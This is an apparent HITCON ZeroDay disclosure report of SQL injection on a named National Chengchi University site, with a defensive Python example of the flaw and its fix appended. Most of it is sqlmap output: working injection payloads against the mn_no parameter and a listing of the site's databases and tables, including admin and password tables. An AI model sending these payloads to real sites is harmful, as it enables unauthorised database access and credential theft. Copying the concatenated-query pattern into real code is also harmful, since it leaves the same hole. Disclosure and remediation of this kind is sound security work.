Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00337
- Vendor: 國立政治大學 (National Chengchi University)
- Title: SQL injection on a National Chengchi University site
- Introduction: SQL injection on the National Chengchi University Master's Program in Counseling and Guidance site
Handling Status
Current Status
- New submission
- Reviewed
- Reported to vendor
- Patch status not reported back
- Not retested
- Published
Handling History
- 2018/04/01 01:15:24 : New submission (status updated by Cra5h)
- 2018/04/01 15:40:11 : Review completed (status updated by the HITCON ZeroDay service team)
- 2018/04/02 11:59:20 : Patch in progress (status updated by the HITCON ZeroDay service team)
- 2018/04/02 11:59:21 : Review completed (status updated by the HITCON ZeroDay service team)
- 2018/04/02 11:59:21 : Patch in progress (status updated by the HITCON ZeroDay service team)
- 2018/06/01 03:00:10 : Published (updated automatically by the HITCON ZeroDay platform)
Details
- ZDID: ZD-2018-00337
- Reporter: cra5h (Cra5h)
- Risk: High
- Type: Database injection attack (SQL Injection)
References
Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Related URLs
Description
SQL injection on the National Chengchi University Master's Program in Counseling and Guidance site
SQL injection location:
http://www.mpcg.nccu.edu.tw/newscontent.php?mn_no=203
Insufficient filtering of the mn_no parameter leads to SQL injection.
GET parameter 'mn_no' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
Parameter: mn_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mn_no=203 AND 9537=9537
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: mn_no=203 AND (SELECT 3068 FROM(SELECT COUNT(*),CONCAT(0x7178767671,(SELECT (ELT(3068=3068,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: mn_no=203 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: mn_no=-1076 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767671,0x47434a4f586866597a794c646a58554d697a5067476e765a43556e6647646a52526b42626a57784f,0x7178767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EWMa
[01:05:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[01:05:41] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mpcg.nccu.edu.tw'
Affected databases confirmed (9):
[01:06:06] [INFO] fetching database names
[01:06:07] [INFO] used SQL query returns 9 entries
[01:06:08] [INFO] retrieved: information_schema
[01:06:08] [INFO] retrieved: cdcol
[01:06:09] [INFO] retrieved: mpcg
[01:06:09] [INFO] retrieved: mysql
[01:06:09] [INFO] retrieved: performance_schema
[01:06:10] [INFO] retrieved: phpmyadmin
[01:06:10] [INFO] retrieved: test
[01:06:11] [INFO] retrieved: webauth
[01:06:11] [INFO] retrieved: wordpress
available databases [9]:
[*] cdcol
[*] information_schema
[*] mpcg
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
[*] wordpress
[01:06:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mpcg.nccu.edu.tw'
Checking row counts per table:
Database: cdcol
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cds | 3 |
+---------------------------------------+---------+
Database: phpmyadmin
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pma_userconfig | 1 |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: mpcg
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mpcg_news | 192 |
| user_data | 37 |
| mpcg_news_en | 11 |
| admin | 2 |
+---------------------------------------+---------+
Database: webauth
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| user_pwd | 1 |
+---------------------------------------+---------+
Database: wordpress
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| wp_options | 116 |
| wp_usermeta | 15 |
| wp_posts | 3 |
| wp_comments | 1 |
| wp_postmeta | 1 |
| wp_term_relationships | 1 |
| wp_term_taxonomy | 1 |
| wp_terms | 1 |
| wp_users | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| time_zone_transition | 117210 |
| time_zone_transition_type | 7716 |
| time_zone | 1685 |
| time_zone_name | 1685 |
| columns_priv | 29 |
| user | 9 |
| tables_priv | 4 |
| a | 3 |
| db | 3 |
| proc | 1 |
| proxies_priv | 1 |
| spider_temp_tab | 1 |
| temp_udf | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 938 |
| SESSION_VARIABLES | 328 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 310 |
| SESSION_STATUS | 310 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| USER_PRIVILEGES | 171 |
| STATISTICS | 133 |
| PARTITIONS | 111 |
| TABLES | 111 |
| KEY_COLUMN_USAGE | 96 |
| TABLE_CONSTRAINTS | 58 |
| CHARACTER_SETS | 39 |
| COLUMN_PRIVILEGES | 29 |
| SCHEMA_PRIVILEGES | 23 |
| PLUGINS | 20 |
| ENGINES | 9 |
| SCHEMATA | 9 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| TABLE_PRIVILEGES | 2 |
| INNODB_TRX | 1 |
| PROCESSLIST | 1 |
| ROUTINES | 1 |
+---------------------------------------+---------+
[01:11:00] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mpcg.nccu.edu.tw'
Remediation Recommendation
Filter the input and use parameterized queries.
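As an added example (not part of the report), the defect class behind the mn_no finding and the two fixes recommended above, shown in Python with an in-memory SQLite database standing in for the site's PHP/MySQL back end; the table layout and rows are constructed, and the test inputs are the boolean-based payloads sqlmap reported above.

```python
import re
import sqlite3

# Constructed stand-in for the site's "mpcg" MySQL schema: only the table
# name mpcg_news is known from the report; the columns and rows are invented.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mpcg_news (mn_no INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO mpcg_news VALUES (?, ?)",
                     [(201, "news 201"), (202, "news 202"), (203, "news 203")])
    return conn

def fetch_news_vulnerable(conn, mn_no):
    # Same defect class as newscontent.php?mn_no=...: the raw GET value is
    # spliced into the SQL text, so "203 AND 9537=9537" is parsed as SQL and
    # the response differs for true and false conditions (the boolean-based
    # blind oracle sqlmap reported).
    sql = "SELECT mn_no, title FROM mpcg_news WHERE mn_no = " + mn_no
    return conn.execute(sql).fetchall()

def fetch_news_parameterized(conn, mn_no):
    # Fix 1 (filtering): mn_no is a record id, so accept only ASCII digits.
    if not re.fullmatch(r"[0-9]{1,10}", mn_no):
        raise ValueError("mn_no must be a non-negative integer")
    # Fix 2 (parameterization): bind the value so the driver sends it as
    # data, never as part of the SQL statement text.
    sql = "SELECT mn_no, title FROM mpcg_news WHERE mn_no = ?"
    return conn.execute(sql, (int(mn_no),)).fetchall()

def compare(mn_no):
    """Run both handlers on one input; returns (vulnerable_rows, fixed_rows_or_error)."""
    conn = make_db()
    vuln = fetch_news_vulnerable(conn, mn_no)
    try:
        fixed = fetch_news_parameterized(conn, mn_no)
    except ValueError as exc:
        fixed = str(exc)
    return vuln, fixed

if __name__ == "__main__":
    # Inputs taken from the sqlmap output in the report above.
    for value in ("203", "203 AND 9537=9537", "203 AND 9537=9538"):
        print(repr(value), "->", compare(value))
```

The vulnerable handler returns the row for the true condition and nothing for the false one, which is exactly the behavioural difference a blind injection relies on; the hardened handler rejects both before any SQL is built.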